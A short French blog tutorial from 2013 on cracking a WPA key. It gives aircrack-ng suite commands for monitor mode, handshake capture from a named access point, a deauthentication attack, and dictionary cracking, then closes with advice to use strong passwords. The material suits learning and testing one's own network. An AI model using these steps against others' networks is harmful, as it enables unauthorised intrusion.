dimanche 24 mars 2013

Crack d'une clef WPA

Pour le citoyen lambda ayant une box adsl, la sécurité devrait être maintenant en WPA ou WPA2. 

Testons un petit peu tout ça !!!

Boot on Kali 

Passez votre carte réseau WLAN en mode monitor : 
airmon-ng start interface



Ecoutez les réseaux :
airodump-ng interface









Dans cet exercice, nous allons cibler le point d'accès dont l'essid est HFK, émettant sur le canal 11 et ayant comme adresse mac 00:20:E0:96:CD:74.


airodump-ng -w fichier -c canal --bssid BSSID interface





Pour obtenir un handshake, vous pouvez attendre qu'un client se connecte ou essayer cette attaque dans un autre terminal :


aireplay-ng -0 10 -a bssid -c station interface









Si l'attaque a réussi, l'apparition du WPA handshake en haut à droite de la fenetre indique la réussite de l'attaque et que le handshake se situe dans le fichier de capture, vous pouvez stopper airodump-ng et aireplay-ng.









Pour cracker le Handshake :
aircrack-ng -w dictionary fichier





Avec un dictionnaire conséquent :













Conclusion, dans le cas ou votre box ne puisse pas fournir de sécurite plus élevée, utilisez un code comportant plusieurs type de caractères et d'une taille généreuse pour decourager les petits malins voulant utiliser cette technique...  

Notez tout de meme qu'il est possible d'utiliser des dictionnaires et des ressources en ligne pour gagner du temps (https://www.cloudcracker.com/)

Aucun commentaire :

Enregistrer un commentaire